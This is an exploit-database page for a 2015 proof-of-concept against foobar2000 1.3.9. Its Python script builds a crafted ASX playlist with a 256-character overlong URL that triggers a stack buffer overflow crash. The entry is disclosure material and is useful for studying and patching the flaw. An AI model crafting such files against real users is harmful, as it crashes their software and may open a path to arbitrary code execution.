header-logo
Suggest Exploit
vendor:
foobar2000
by:
Antonio Z.
7,8
CVSS
HIGH
Local Crash
119
CWE
Product Name: foobar2000
Affected Version From: 1.3.9
Affected Version To: 1.3.9
Patch Exists: NO
Related CWE: N/A
CPE: foobar2000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
2015

foobar2000 1.3.9 (.asx) Local Crash PoC

This exploit is a proof of concept for a local crash vulnerability in foobar2000 1.3.9. The vulnerability is caused due to a boundary error when processing ASX files and can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted ASX file. This may allow execution of arbitrary code.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64

# Instructions: Create playlist.asx:
# <asx version="3.0">
#   <title>Example.com Live Stream</title>
#
#   <entry>
#     <title>Short Announcement to Play Before Main Stream</title>
#     <ref href="http://example.com/announcement.wma" />
#     <param name="aParameterName" value="aParameterValue" />
#   </entry>
#
#   <entry>
#     <title>Example radio</title>
#     <ref href="http://example.com" />
#     <author>Example.com</author>
#     <copyright>example.com</copyright>
#   </entry>
# </asx>

import os
import shutil

evil = 'A' * 256

shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')

file = open('Local_Crash_PoC.asx','r')
file_data = file.read()
file.close()
file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
file = open('Local_Crash_PoC.asx','w')
file.write(file_new_data)
file.close()

Navigation

Suggest Exploit

Services By CQR